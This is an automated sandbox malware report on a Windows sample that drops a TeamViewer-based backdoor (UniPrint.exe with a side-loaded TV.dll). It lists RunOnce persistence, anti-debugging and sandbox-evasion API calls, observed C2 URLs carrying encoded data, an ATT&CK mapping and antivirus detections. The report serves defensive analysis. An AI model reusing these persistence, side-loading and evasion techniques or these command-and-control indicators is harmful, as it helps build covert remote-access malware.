Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_00500C6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004FFF68
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 3040Thread sleep count: 301 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 3040Thread sleep time: -150500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 5512Thread sleep count: 294 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 5512Thread sleep time: -147000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6328Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004FFF68
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpBinary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpBinary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU{*4
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpBinary or memory string: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmpBinary or memory string: J6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpBinary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pUN*i
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpBinary or memory string: ?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeOpen window title or class name: ollydbg
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detectedShow sources
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C54A0 LogonUserW,GetLastError,CloseHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C34E0 OpenProcessToken,HeapAlloc,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidW,FreeSid,GetProcessHeap,HeapFree,CloseHandle,
Source: UniPrint.exe, 00000005.00000002.1075366890.0000000003CB0000.00000004.00000001.sdmpBinary or memory string: Program Manager
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmpBinary or memory string: Progman
Source: UniPrint.exe, 00000005.00000002.1075366890.0000000003CB0000.00000004.00000001.sdmpBinary or memory string: usercomputerusProgram ManagerC:\Windows\explorer.exe3910574588847
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: nsrC1CA.tmp.0.drBinary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,73D5A680,lstrcat,lstrlen,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Windows Management Instrumentation11DLL Side-Loading11DLL Side-Loading11Deobfuscate/Decode Files or Information1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsNative API1DLL Search Order Hijacking2DLL Search Order Hijacking2Obfuscated Files or Information2LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsService Execution12Create Account1Valid Accounts2Software Packing1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Valid Accounts2Access Token Manipulation21DLL Side-Loading11NTDSSystem Information Discovery26Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronWindows Service22Windows Service22DLL Search Order Hijacking2LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRegistry Run Keys / Startup Folder1Process Injection12Masquerading1Cached Domain CredentialsSecurity Software Discovery341VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Valid Accounts2DCSyncVirtualization/Sandbox Evasion11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion11Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation21/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
wogZe27GBB.exe54%VirustotalBrowse
wogZe27GBB.exe9%MetadefenderBrowse
wogZe27GBB.exe62%ReversingLabsWin32.Worm.AutoRun

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll6%MetadefenderBrowse
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll51%ReversingLabsWin32.Trojan.Phonzy
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.2.wogZe27GBB.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
0.0.wogZe27GBB.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://widolapsed.info/apsed.info/B8C631A8/TTP-Out)LMEMX0%Avira URL Cloudsafe
http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002.0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000023321935-2125563209-4053060%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/.i0%Avira URL Cloudsafe
http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate:%0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
https://widolapsed.info/8C631A8/ELBASE.dll.mui010%Avira URL Cloudsafe
http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=1000000120%Avira URL Cloudsafe
http://188.172.235.146/0%Avira URL Cloudsafe
http://188.172.235.146/EM0%Avira URL Cloudsafe
http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGateZ0%Avira URL Cloudsafe
